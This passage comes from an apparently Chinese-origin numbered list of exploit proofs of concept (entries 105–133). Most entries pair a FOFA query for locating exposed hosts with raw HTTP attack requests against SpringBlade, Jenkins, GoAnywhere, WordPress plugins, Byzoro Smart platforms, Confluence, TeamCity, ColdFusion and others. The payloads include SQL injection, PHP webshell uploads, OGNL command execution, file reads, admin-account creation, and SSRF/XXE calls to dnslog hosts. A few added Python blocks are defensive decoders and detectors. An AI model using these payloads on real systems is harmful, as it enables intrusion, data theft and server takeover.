Connection: close

{
"topicurl":"getSysStatusCfg",
"token":""
}

105. SpringBlade v3.2.0 export-user SQL injection
FOFA: body="https://bladex.vip"
http://192.168.40.130.90/api/bla ... ame&1-updatexml(1,concat(0x7e,md5(102103122),0x7e),1)=1

106. SpringBlade dict-biz/list SQL injection
FOFA: body="Saber 将不能正常工作"
GET /api/blade-system/dict-biz/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Blade-Auth: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzUxMiJ9.eyJpc3MiOiJpc3N1c2VyIiwiYXVkIjoiYXVkaWVuY2UiLCJ0ZW5hbnRfaWQiOiIwMDAwMDAiLCJyb2xlX25hbWUiOiJhZG1pbmlzdHJhdG9yIiwidXNlcl9pZCI6IjExMjM1OTg4MjE3Mzg2NzUyMDEiLCJyb2xlX2lkIjoiMTEyMzU5ODgxNjczODY3NTIwMSIsInVzZXJfbmFtZSI6ImFkbWluIiwib2F1dGhfaWQiOiIiLCJ0b2tlbl90eXBlIjoiYWNjZXNzX3Rva2VuIiwiZGVwdF9pZCI6IjExMjM1OTg4MTM3Mzg2NzUyMDEiLCJhY2NvdW50IjoiYWRtaW4iLCJjbGllbnRfaWQiOiJzd29yZCIsImV4cCI6MTc5MTU3MzkyMiwibmJmIjoxNjkxNTcwMzIyfQ.wxB9etQp2DUL5d3-VkChwDCV3Kp-qxjvhIF_aD_beF_KLwUHV7ROuQeroayRCPWgOcmjsOVq6FWdvvyhlz9j7A
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

107. SpringBlade tenant/list SQL injection
FOFA: body="https://bladex.vip"
GET /api/blade-system/tenant/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Blade-Auth: <replace with your own token>
Connection: close

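Entries 105 to 107 share one root cause: the injection sits in the parameter name, not its value, because the list endpoints turn every request parameter into a column filter. The block below is an added example, not SpringBlade's or MyBatis-Plus's code: a stand-in map-to-WHERE builder over a constructed sqlite table, first trusting the key (the vulnerable shape), then restricted to an allowlist of real column names. The updatexml() error-based form from the entries is MySQL-specific, so the injected keys here use a boolean-based subquery that sqlite understands; the mechanism is the same.

```python
import re
import sqlite3

# Allowlist of columns that the endpoint is allowed to filter on (ours, for the example).
COLUMNS = {"id", "code", "value"}
_IDENT = re.compile(r"^[A-Za-z_][A-Za-z0-9_]*$")


def _db():
    """Constructed in-memory table standing in for blade_dict / blade_tenant."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE dict(id INTEGER, code TEXT, value TEXT)")
    con.executemany("INSERT INTO dict VALUES (?, ?, ?)",
                    [(1, "dict_a", "alpha"), (2, "dict_b", "beta"), (3, "secret", "s3cr3t")])
    return con


def where_vulnerable(params):
    """Every request parameter becomes '<key> = ?'. The VALUE is bound safely,
    the KEY is concatenated, so '?updatexml(...)=1' lands inside the SQL."""
    clauses = [f"{key} = ?" for key in params]
    return " AND ".join(clauses), list(params.values())


def key_accepted(key):
    return bool(_IDENT.match(key)) and key in COLUMNS


def where_hardened(params):
    """Same builder, but a key must be a plain identifier on the allowlist."""
    clauses = []
    for key in params:
        if not key_accepted(key):
            raise ValueError(f"rejected filter key: {key!r}")
        clauses.append(f'"{key}" = ?')        # quoted identifier, value still bound
    return " AND ".join(clauses), list(params.values())


def lookup(params, builder=where_vulnerable):
    where, values = builder(params)
    con = _db()
    try:
        return con.execute(f"SELECT id, code FROM dict WHERE {where}", values).fetchall()
    finally:
        con.close()


if __name__ == "__main__":
    # An ordinary filter, a filter-bypass key, and an oracle key that leaks
    # the first character of a row the caller should never see.
    oracle = "(SELECT substr(value,1,1) FROM dict WHERE code='secret')"
    print(lookup({"code": "dict_a"}))
    print(lookup({"1=1 OR code": "x"}))                  # all rows: filter bypassed
    print(lookup({oracle: "s"}), lookup({oracle: "t"}))  # rows only when the guess is right
    print(lookup({"code": "dict_a"}, where_hardened))
    try:
        lookup({oracle: "s"}, where_hardened)
    except ValueError as exc:
        print("hardened:", exc)
```

The guess-and-compare loop over `oracle` is exactly what the updatexml() trick shortcuts on MySQL: there the error message returns the value in one request instead of one character per request. Log review for these endpoints should therefore look at parameter names, since WAF rules that only inspect values never see the payload.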
108. D-Tale 3.9.0 SSRF
CVE-2024-21642
FOFA: "dtale/static/images/favicon.png"
GET /dtale/web-upload?type=csv&url=http%3A%2F%2Fa4xs0nop.dnslog.pw HTTP/1.1
Host: your-ip
Accept: application/json, text/plain, */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close


109. Jenkins CLI arbitrary file read
CVE-2024-23897
FOFA: header="X-Jenkins"
POST /cli?remoting=false HTTP/1.1
Host:
Content-type: application/octet-stream
Session: 39382176-ac9c-4a00-bbc6-4172b3cf1e92
Side: upload
Connection: keep-alive
Content-Length: 163

b'\x00\x00\x00\x06\x00\x00\x04help\x00\x00\x00\x0e\x00\x00\x0c@/etc/passwd\x00\x00\x00\x05\x02\x00\x03GBK\x00\x00\x00\x07\x01\x00\x05en_US\x00\x00\x00\x00\x03'

POST /cli?remoting=false HTTP/1.1
Host:
Session: 39382176-ac9c-4a00-bbc6-4172b3cf1e92
Side: download
Content-Type: application/x-www-form-urlencoded
Content-Length: 0

Response on the download side (lines of /etc/passwd come back inside the help command's error text and default value):
ERROR: Too many arguments: daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
java -jar jenkins-cli.jar help [COMMAND]
Lists all the available commands or a detailed description of single command.
 COMMAND : Name of the command (default: root:x:0:0:root:/root:/bin/bash)

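The upload body in entry 109 is a frame stream, not random bytes. The block below is an added example (not Jenkins' code) that decodes it and flags the `@file` argument, which is what args4j expands into the file's contents: a useful check on captured `/cli?remoting=false` uploads. The frame layout (big-endian int32 length of the bytes after the opcode, one opcode byte, then a Java `writeUTF`-style string with a uint16 length prefix) is inferred from the bytes on the page; the opcode names are the example author's reading of Jenkins' PlainCLIProtocol and are an assumption. The encoder exists only to confirm that reading by reproducing the page's bytes.

```python
import struct

# Assumed opcode names (Jenkins PlainCLIProtocol as recalled for this example).
OPCODES = {0: "ARG", 1: "LOCALE", 2: "ENCODING", 3: "START", 4: "EXIT",
           5: "STDIN", 6: "END_STDIN", 7: "STDOUT", 8: "STDERR"}
STRING_OPS = {"ARG", "LOCALE", "ENCODING"}

# Upload body copied from entry 109 above.
CAPTURED = (b'\x00\x00\x00\x06\x00\x00\x04help'
            b'\x00\x00\x00\x0e\x00\x00\x0c@/etc/passwd'
            b'\x00\x00\x00\x05\x02\x00\x03GBK'
            b'\x00\x00\x00\x07\x01\x00\x05en_US'
            b'\x00\x00\x00\x00\x03')


def decode_frames(data):
    """Return [(opcode_name, payload)] for a plain-CLI upload body.
    String payloads are decoded (ASCII here; Java's modified UTF-8 only
    differs for NUL and supplementary characters)."""
    frames, pos = [], 0
    while pos + 5 <= len(data):
        (length,) = struct.unpack(">I", data[pos:pos + 4])
        opcode = data[pos + 4]
        payload = data[pos + 5:pos + 5 + length]
        if len(payload) != length:
            raise ValueError(f"truncated frame at offset {pos}")
        pos += 5 + length
        name = OPCODES.get(opcode, f"OP{opcode}")
        if name in STRING_OPS:
            (slen,) = struct.unpack(">H", payload[:2])
            payload = payload[2:2 + slen].decode("utf-8")
        frames.append((name, payload))
    if pos != len(data):
        raise ValueError("trailing bytes after last frame")
    return frames


def summarise(data):
    """What the client asked Jenkins to run, plus any args4j @file references."""
    frames = decode_frames(data)
    args = [p for n, p in frames if n == "ARG"]
    return {
        "command": args[0] if args else None,
        "args": args[1:],
        "encoding": next((p for n, p in frames if n == "ENCODING"), None),
        "locale": next((p for n, p in frames if n == "LOCALE"), None),
        # '@path' is replaced by the file's contents before the command sees it.
        "file_refs": [a for a in args if a.startswith("@")],
    }


def _utf(text):
    raw = text.encode("utf-8")
    return struct.pack(">H", len(raw)) + raw


def _frame(opcode, payload=b""):
    return struct.pack(">I", len(payload)) + bytes([opcode]) + payload


def build_request(args, encoding="UTF-8", locale="en_US"):
    """Encoder, in the same frame order as the captured body: ARG..., ENCODING, LOCALE, START."""
    body = b"".join(_frame(0, _utf(a)) for a in args)
    return body + _frame(2, _utf(encoding)) + _frame(1, _utf(locale)) + _frame(3)


if __name__ == "__main__":
    for name, payload in decode_frames(CAPTURED):
        print(f"{name:9s} {payload!r}")
    print(summarise(CAPTURED))
```

On a busy controller the cheap filter is `file_refs`: legitimate CLI use almost never passes `@`-prefixed arguments, so any upload whose summary has a non-empty `file_refs` list deserves a look regardless of which command precedes it.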
110. GoAnywhere MFT unauthenticated administrator creation
CVE-2024-0204
FOFA: body="InvalidBrowser.xhtml" || icon_hash="1484947000" || icon_hash="1828756398" || icon_hash="1170495932"
GET /goanywhere/images/..;/wizard/InitialAccountSetup.xhtml HTTP/1.1
Host: 192.168.40.130:8000
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip
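Entries 91, 101 and 110 all reach their target through a path that looks different to the front proxy than to the application: `..;/` survives a proxy that only normalises `../`, because a Java servlet container strips `;param` from each segment before resolving dot segments, and `%3b` hides the `;` that ends a path in entry 101. The block below is an added example, not code from the original post or from any of the vendors: it normalises a raw request URL the way the container will, and reports the tricks it saw. The request lines are the three from the entries plus a constructed benign one; the `SENSITIVE_TARGETS` set is the example's own, not a vendor signature list.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Endpoints from entries 91, 101 and 110 as they look AFTER normalisation.
# Example author's own list, not a vendor-supplied signature set.
SENSITIVE_TARGETS = {
    "/center/api/orgManage/v1/orgs/download",          # entry 91
    "/api/v1/license/keys-status/",                     # entry 101
    "/goanywhere/wizard/InitialAccountSetup.xhtml",     # entry 110
}


def strip_path_params(path):
    """Drop ';name=value' from every segment, as Tomcat does before servlet
    matching: '..;' reaches the backend as '..' even though a front proxy
    that only looked for '../' saw nothing to collapse."""
    return "/".join(seg.split(";", 1)[0] for seg in path.split("/"))


def resolve_dot_segments(path):
    """Resolve '.' and '..' without ever climbing above '/'."""
    out = [""]                               # leading "" keeps the root slash
    for seg in path.split("/")[1:]:
        if seg == "..":
            if len(out) > 1:
                out.pop()
        elif seg != ".":
            out.append(seg)
    return "/".join(out) or "/"


def analyse(raw_url):
    """Return the backend-visible path and the evasion tricks seen in the raw URL."""
    parts = urlsplit(raw_url)                # urlsplit leaves ';' inside the path
    decoded_path = unquote(parts.path)
    stripped = strip_path_params(decoded_path)
    normalized = resolve_dot_segments(stripped)
    findings = []
    if "..;" in decoded_path:
        findings.append("dot-segment-with-path-param")      # entries 91, 110
    elif ".." in stripped.split("/"):
        findings.append("dot-segments")                     # entry 101
    if re.search(r"%2e|%3b", parts.path, re.IGNORECASE):
        findings.append("encoded-dot-or-semicolon")         # entry 101 hides ';' as %3b
    if any("../" in value or "..\\" in value
           for _, value in parse_qsl(parts.query, keep_blank_values=True)):
        findings.append("traversal-in-query")               # entry 91: fileName=../../
    if normalized in SENSITIVE_TARGETS:
        findings.append("sensitive-target")
    return {"normalized": normalized, "findings": findings}


# Constructed request lines: the three URLs from the entries above plus a benign one.
SAMPLE_URLS = [
    "/center/api/task/..;/orgManage/v1/orgs/download?fileName=../../../../../../../etc/passwd",
    "/api/v1/totp/user-backup-code/../../license/keys-status/%3bcurl%20a4xs0nop.dnslog.pw",
    "/goanywhere/images/..;/wizard/InitialAccountSetup.xhtml",
    "/center/api/task/list?page=1",
]

if __name__ == "__main__":
    for url in SAMPLE_URLS:
        result = analyse(url)
        print(f"{url}\n  -> {result['normalized']}  {result['findings'] or 'clean'}")
```

Run it over the request field of your access logs rather than over alert output: the normalised path is what to compare against your access-control rules, and a request whose raw and normalised paths fall under different rules is the finding, whether or not the target is on the list above.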

111. WordPress plugin HTML5 Video Player SQL injection
CVE-2024-1061
FOFA: "wordpress" && body="html5-video-player"
GET /?rest_route=/h5vp/v1/view/1&id=1'+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))a)--+- HTTP/1.1
Host: 192.168.40.130:112
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

112. WordPress plugin NotificationX SQL injection
CVE-2024-1698
FOFA: body="/wp-content/plugins/notificationx"
POST /wp-json/notificationx/v1/analytics HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json

{"nx_id": "1","type": "clicks`=1 and 1=sleep(5)-- -"}

113. WordPress Automatic plugin arbitrary file download and SSRF
CVE-2024-27954
FOFA: "/wp-content/plugins/wp-automatic"
GET /?p=3232&wp_automatic=download&link=file:///etc/passwd HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

114. WordPress MasterStudy LMS plugin SQL injection
FOFA: body="wp-content/plugins/masterstudy-lms-learning-management-system/"
GET /?rest_route=/lms/stm-lms/order/items&author_id=1&user=1)+AND+%28SELECT+3493+FROM+%28SELECT%28SLEEP%285%29%29%29sauT%29+AND+%283071%3D3071 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close

115. WordPress Bricks Builder <= 1.9.6 RCE
CVE-2024-25600
FOFA: body="/wp-content/themes/bricks/"
Step 1: obtain the site's nonce
GET / HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36
Connection: close
Accept-Encoding: gzip

Step 2: substitute the nonce and execute the command
POST /wp-json/bricks/v1/render_element HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
Connection: close
Content-Length: 356
Content-Type: application/json
Accept-Encoding: gzip

{
  "postId": "1",
  "nonce": "<value obtained in step 1>",
  "element": {
    "name": "container",
    "settings": {
      "hasLoop": "true",
      "query": {
        "useQueryEditor": true,
        "queryEditor": "ob_start();echo `id`;$output=ob_get_contents();ob_end_clean();throw new Exception($output);",
        "objectType": "post"
      }
    }
  }
}

116. WordPress js-support-ticket file upload
FOFA: body="wp-content/plugins/js-support-ticket"
POST /wp-admin/?page=configuration&task=saveconfiguration HTTP/1.1
Host:
Content-Type: multipart/form-data; boundary=--------767099171
User-Agent: Mozilla/5.0

----------767099171
Content-Disposition: form-data; name="action"

configuration_saveconfiguration
----------767099171
Content-Disposition: form-data; name="form_request"

jssupportticket
----------767099171
Content-Disposition: form-data; name="support_custom_img"; filename="{{rand8}}.php"
Content-Type: image/png

----------767099171--

117. WordPress LayerSlider plugin SQL injection
Affected versions: 7.9.11 – 7.10.0
FOFA: body="/wp-content/plugins/LayerSlider/"
GET /wp-admin/admin-ajax.php?action=ls_get_popup_markup&id[where]=1)and+(SELECT+6416+FROM+(SELECT(SLEEP(5)))nEiK)--+vqlq HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Upgrade-Insecure-Requests: 1

118. Byzoro (北京百绰智能) Smart S210 management platform uploadfile.php arbitrary file upload
CVE-2024-0939
FOFA: title="Smart管理平台"
POST /Tool/uploadfile.php? HTTP/1.1
Host: 192.168.40.130:8443
Cookie: PHPSESSID=fd847fe4280e50c2c3855ffdee69b8f8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/117.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------13979701222747646634037182887
Content-Length: 405
Origin: https://192.168.40.130:8443
Referer: https://192.168.40.130:8443/Tool/uploadfile.php
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close

-----------------------------13979701222747646634037182887
Content-Disposition: form-data; name="file_upload"; filename="contents.php"
Content-Type: application/octet-stream

<?php
system($_POST["passwd"]);
?>
-----------------------------13979701222747646634037182887
Content-Disposition: form-data; name="txt_path"

/home/src.php
-----------------------------13979701222747646634037182887--

Then access /home/src.php (the txt_path field controls where the upload is written).

119. Byzoro Smart S20 backend sysmanageajax.php SQL injection
CVE-2024-1254
FOFA: title="Smart管理平台"
Log in first; the default credentials are admin/admin.
POST /sysmanage/sysmanageajax.php HTTP/1.1
Host: x.x.x.x
Cookie: PHPSESSID=b7e24f2cb8b51338e8531e0b50da49ee
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 109
Origin: https://x.x.x.x:8443
Referer: https://x.x.x.x:8443/sysmanage/manageadmin.php
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
X-Forwarded-For: 1.1.1.1
X-Originating-Ip: 1.1.1.1
X-Remote-Ip: 1.1.1.1
X-Remote-Addr: 1.1.1.1
Te: trailers
Connection: close

src=manageadmin&type=add&id=(select*from(select+if(length(database())=3,sleep(5),1))a)|1|1&value=test2|123456

120. Byzoro Smart S40 management platform web.php import arbitrary file upload
CVE-2024-1253
FOFA: title="Smart管理平台"
POST /useratte/web.php? HTTP/1.1
Host: ip:port
Cookie: PHPSESSID=cb5c0eb7b9fabee76431aaebfadae6db
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------42328904123665875270630079328
Content-Length: 597
Origin: https://ip:port
Referer: https://ip:port/sysmanage/licence.php
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close

-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="file_upload"; filename="2.php"
Content-Type: application/octet-stream

<?php phpinfo()?>
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="id_type"

1
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="1_ck"

1_radhttp
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="mode"

import
-----------------------------42328904123665875270630079328--

The uploaded file is written to /upload/2.php.

121. Beijing Baichuo Smart S42 management platform: arbitrary file upload via userattestation.php
CVE-2024-1918
FOFA:title="Smart管理平台"
POST /useratte/userattestation.php HTTP/1.1
Host: 192.168.40.130:8443
Cookie: PHPSESSID=2174712c6aeda51c4fb6e6c5e6aaac50
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------42328904123665875270630079328
Content-Length: 592
Origin: https://192.168.40.130:8443
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close

-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="web_img"; filename="1.php"
Content-Type: application/octet-stream

<?php phpinfo();?>
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="id_type"

1
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="1_ck"

1_radhttp
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="hidwel"

set
-----------------------------42328904123665875270630079328

File path: boot/web/upload/weblogo/1.php

122. Beijing Baichuo Smart s200 management platform: SQL injection in /importexport.php
CVE-2024-27718
FOFA:title="Smart管理平台"
Here sql=c2VsZWN0IDEsZGF0YWJhc2UoKSx2ZXJzaW9uKCk= is the SQL statement base64-encoded; decoded it reads: sql=select 1,database(),version()
GET /importexport.php?sql=c2VsZWN0IDEsZGF0YWJhc2UoKSx2ZXJzaW9uKCk=&type=exportexcelbysql HTTP/1.1
Host: x.x.x.x
Cookie: PHPSESSID=f20e837c8024f47058ad2f689873dfc0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
Te: trailers
Connection: close

123. Atlassian Confluence template injection code execution
FOFA:app="ATLASSIAN-Confluence" && body="由 Atlassian 合流8.5.3"
POST /template/aui/text-inline.vm HTTP/1.1
Host: localhost:8090
Accept-Encoding: gzip, deflate, br
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.6045.159 Safari/537.36
Connection: close
Content-Type: application/x-www-form-urlencoded

label=\u0027%2b#request\u005b\u0027.KEY_velocity.struts2.context\u0027\u005d.internalGet(\u0027ognl\u0027).findValue(#parameters.x,{})%2b\u0027&x=@org.apache.struts2.ServletActionContext@getResponse().setHeader('X-Cmd-Response',(new freemarker.template.utility.Execute()).exec({"id"}))

124. Hunan Jianyan engineering quality inspection system arbitrary file upload
FOFA:body="/Content/Theme/Standard/webSite/login.css"
POST /Scripts/admintool?type=updatefile HTTP/1.1
Host: 192.168.40.130:8282
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
Content-Length: 72
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: application/x-www-form-urlencoded

filePath=abcgcg.aspx&fileContent=<%Response.Write("Hello,World")%>

http://192.168.40.130:8282/Scripts/abcgcg.aspx

125. ConnectWise ScreenConnect authentication bypass
CVE-2024-1709
FOFA:icon_hash="-82958153"
https://github.com/watchtowrlabs ... bypass-add-user-poc

Usage:
python watchtowr-vs-ConnectWise_2024-02-21.py --url http://localhost --username hellothere --password admin123!

After the user has been created, log in to the admin backend directly; system commands can then be executed.

126. aiohttp path traversal
FOFA:title=="ComfyUI"
GET /static/../../../../../etc/passwd HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

127. Glodon Linkworks DataExchange.ashx XXE
FOFA:body="Services/Identification/login.ashx"
POST /GB/LK/Document/DataExchange/DataExchange.ashx HTTP/1.1
Host: 192.168.40.130:8888
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.171 Safari/537.36
Content-Length: 415
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: multipart/form-data;boundary=----WebKitFormBoundaryJGgV5l5ta05yAIe0
Purpose: prefetch
Sec-Purpose: prefetch;prerender

------WebKitFormBoundaryJGgV5l5ta05yAIe0
Content-Disposition: form-data;name="SystemName"

BIM
------WebKitFormBoundaryJGgV5l5ta05yAIe0
Content-Disposition: form-data;name="Params"
Content-Type: text/plain

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE test [
<!ENTITY t SYSTEM "http://c2vkbwbs.dnslog.pw">
]
>
<test>&t;</test>
------WebKitFormBoundaryJGgV5l5ta05yAIe0--

128. Adobe ColdFusion deserialization
CVE-2023-38203
Adobe ColdFusion versions 2018u17 (and earlier), 2021u7 (and earlier) and 2023u1 (and earlier)
FOFA:app="Adobe-ColdFusion"
PAYLOAD

129. Adobe ColdFusion arbitrary file read
CVE-2024-20767
FOFA:app="Adobe-ColdFusion" && title=="Error Occurred While Processing Request"
Step 1: obtain the uuid
GET /CFIDE/adminapi/_servermanager/servermanager.cfc?method=getHeartBeat HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Connection: close

Step 2: read the /etc/passwd file
GET /pms?module=logging&file_name=../../../../../../../etc/passwd&number_of_lines=100 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Connection: close
uuid: 85f60018-a654-4410-a783-f81cbd5000b9

130. Laykefu customer-service system arbitrary file upload
FOFA:icon_hash="-334624619"
POST /admin/users/upavatar.html HTTP/1.1
Host: 127.0.0.1
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 Edg/107.0.1418.26
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary3OCVBiwBVsNuB2kR
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: user_name=1; user_id=3
Connection: close

------WebKitFormBoundary3OCVBiwBVsNuB2kR
Content-Disposition: form-data; name="file"; filename="1.php"
Content-Type: image/png

<?php phpinfo();@eval($_POST['sec']);?>
------WebKitFormBoundary3OCVBiwBVsNuB2kR--

131. Mini-Tmall <=20231017 SQL injection
FOFA:icon_hash="-2087517259"
Admin backend address: http://localhost:8080/tmall/admin
http://localhost:8080/tmall/admin/user/1/1?orderBy=7,if((length(database())=11),SLEEP(3),0)

132. JetBrains TeamCity 2023.11.3 and earlier authentication bypass
CVE-2024-27198
FOFA:body="Log in to TeamCity"
POST /pwned?jsp=/app/rest/users;.jsp HTTP/1.1
Host: 192.168.40.130:8111
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: */*
Content-Type: application/json
Accept-Encoding: gzip, deflate

{"username": "用户名", "password": "密码", "email": "test@mydomain.com", "roles": {"role": [{"roleId": "SYSTEM_ADMIN", "scope": "g"}]}}

CVE-2024-27199
/res/../admin/diagnostic.jsp
/.well-known/acme-challenge/../../admin/diagnostic.jsp
/update/../admin/diagnostic.jsp

CVE-2024-27198-RCE.py

133. H5 cloud mall file.php file upload
FOFA:body="/public/qbsp.php"
POST /admin/commodtiy/file.php?upload=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryFQqYtrIWb8iBxUCx

------WebKitFormBoundaryFQqYtrIWb8iBxUCx
Content-Disposition: form-data; name="file"; filename="rce.php"
